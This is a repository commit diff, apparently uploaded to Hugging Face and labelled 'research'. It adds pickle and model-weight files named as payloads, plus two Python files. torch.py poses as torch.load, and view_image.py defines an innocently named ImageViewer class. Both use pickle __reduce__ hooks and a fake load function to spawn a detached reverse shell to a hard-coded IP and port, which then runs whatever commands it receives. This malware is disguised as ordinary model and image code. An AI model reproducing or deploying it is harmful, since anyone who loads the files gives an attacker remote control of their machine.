Upload folder using huggingface_hub

README.md

@@ -1,3 +1,3 @@
----
-license: mit
----
+## Research
+
+This is used for research purposes.

another_safe_payload.pkl

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d406213916cdc6d8c62c53b18d91a00939e71c21197bff1297b3ff4702a776fb
+size 35

dynamic_payload.model

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:40d212c110ad5efa409ac8189214c7f06de134f08d2d660437f8546fdc294284
+size 61

dynamic_payload.pickle

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:40d212c110ad5efa409ac8189214c7f06de134f08d2d660437f8546fdc294284
+size 61

dynamic_payload.pkl

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:40d212c110ad5efa409ac8189214c7f06de134f08d2d660437f8546fdc294284
+size 61

dynamic_payload.pth

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:40d212c110ad5efa409ac8189214c7f06de134f08d2d660437f8546fdc294284
+size 61

paylaod.3.pt

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2535881622ff34604ad593e0d1bf54879665f3b8c7e7f008f216814ddab0182a
+size 54

payload.2.pkl

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a88e6b044094d282abbb1f86b11ad0c60bc93616642d9d830dda71218c07fd1a
+size 50

payload.3.pkl

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2535881622ff34604ad593e0d1bf54879665f3b8c7e7f008f216814ddab0182a
+size 54

payload.pkl

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:aaa9eceb19594319240109c253690ab3d868e73a43f5f71f54a7008c8ee22f1d
+size 53

pytorch_model.2.bin

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6950c409e9f69c53f066d35fac47f08503a5823955604cc36a5dcb04d5e48676
+size 2509

pytorch_model.bin

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2cc55b1e17f80af2159d1d57fb38c24b204d4f8184bedeee8b7de8ad004798ab
+size 1337

test.pkl

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fa7a4b98f956247938e4a04f02df1f85e4c304752a7ee4bc6dd24b4cd23e489d
+size 127

torch.py

@@ -0,0 +1,66 @@
+from typing import Optional, Any
+
+def spawn_detached_shell(attacker_ip="172.17.13.12", attacker_port=4444):
+    import sys
+    import subprocess
+    import os
+    
+    code = f'''
+import socket
+import subprocess
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("{attacker_ip}", {attacker_port}))
+
+while True:
+    s.send(b"$ ")
+    cmd = s.recv(1024).decode()
+    if cmd.strip() in {{"exit", "quit"}}:
+        break
+    try:
+        output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
+    except subprocess.CalledProcessError as e:
+        output = e.output
+    s.send(output)
+
+s.close()
+'''
+
+    if sys.platform == "win32":
+        DETACHED_PROCESS = 0x00000008
+        subprocess.Popen([sys.executable, "-c", code],
+                         creationflags=DETACHED_PROCESS,
+                         stdout=subprocess.DEVNULL,
+                         stderr=subprocess.DEVNULL,
+                         stdin=subprocess.DEVNULL,
+                         close_fds=True)
+    else:
+        # Unix-like: start new session to detach process
+        subprocess.Popen([sys.executable, "-c", code],
+                         stdout=subprocess.DEVNULL,
+                         stderr=subprocess.DEVNULL,
+                         stdin=subprocess.DEVNULL,
+                         preexec_fn=os.setsid,
+                         close_fds=True)
+
+class FileLike:
+    pass
+
+class _utils:
+    def __reduce__(self):
+        return (_utils._rebuild_tensor_v2, ())
+    @staticmethod
+    def _rebuild_tensor_v2(*args, **kwargs):
+       spawn_detached_shell()
+
+def load(
+    f: FileLike,
+    map_location = None,
+    pickle_module: Any = None,
+    *,
+    weights_only: Optional[bool] = None,
+    mmap: Optional[bool] = None,
+    **pickle_load_args: Any,
+):
+    spawn_detached_shell()
+    

very_safe_payload.pkl

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:86ed8b4153be6c86a56d6dc15ef7fb66a3f04c2563ee6da07661ad6c3d36df87
+size 891

view_image.py

@@ -0,0 +1,52 @@
+import subprocess
+import sys
+import os
+
+class ImageViewer:
+    def __init__(self, attacker_ip="172.17.13.12", attacker_port=4444):
+        self.ip = attacker_ip
+        self.port = attacker_port
+
+    def __reduce__(self):
+        return (self._spawn_detached_shell, (self.ip, self.port))
+
+    @staticmethod
+    def _spawn_detached_shell(attacker_ip, attacker_port):
+        code = f'''
+import socket
+import subprocess
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("{attacker_ip}", {attacker_port}))
+
+while True:
+    s.send(b"$ ")
+    cmd = s.recv(1024).decode()
+    if cmd.strip() in {{"exit", "quit"}}:
+        break
+    try:
+        output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
+    except subprocess.CalledProcessError as e:
+        output = e.output
+    s.send(output)
+
+s.close()
+'''
+
+        if sys.platform == "win32":
+            DETACHED_PROCESS = 0x00000008
+            subprocess.Popen([sys.executable, "-c", code],
+                             creationflags=DETACHED_PROCESS,
+                             stdout=subprocess.DEVNULL,
+                             stderr=subprocess.DEVNULL,
+                             stdin=subprocess.DEVNULL,
+                             close_fds=True)
+        else:
+            # Unix-like: start new session to detach process
+            subprocess.Popen([sys.executable, "-c", code],
+                             stdout=subprocess.DEVNULL,
+                             stderr=subprocess.DEVNULL,
+                             stdin=subprocess.DEVNULL,
+                             preexec_fn=os.setsid,
+                             close_fds=True)
+